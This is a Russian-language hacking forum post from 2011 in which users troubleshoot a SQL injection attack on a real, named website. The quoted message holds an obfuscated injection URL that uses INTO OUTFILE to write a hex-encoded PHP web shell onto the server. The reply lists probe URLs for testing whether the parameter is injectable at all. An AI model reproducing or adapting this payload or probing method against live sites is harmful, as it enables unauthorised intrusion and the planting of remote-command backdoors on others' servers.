24.10.2011, 23:16
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от z0mbie86
Что неправильно я делаю?
Код:
http://wifi.hm-ugratel.ru/?m[admin]&id=',''and(SELECT/**/0x2533433F7068702532306576616C28245F52455554553545B636D645D293B25/**/INTO/**/OUTFILE/**/'/srv/www/vhosts/217.8.80.55/modules/gw/jindex.php')and'
А там есть вообще sql inj?
http://wifi.hm-ugratel.ru/?m[admin]&id=123
http://wifi.hm-ugratel.ru/?m[admin]&id=abc
http://wifi.hm-ugratel.ru/?m[admin]&id=123'
http://wifi.hm-ugratel.ru/?m[admin]&id=abc'
Разницу чувствуешь? я - нет. Если и есть, то жесть какая слепая.
|
|
|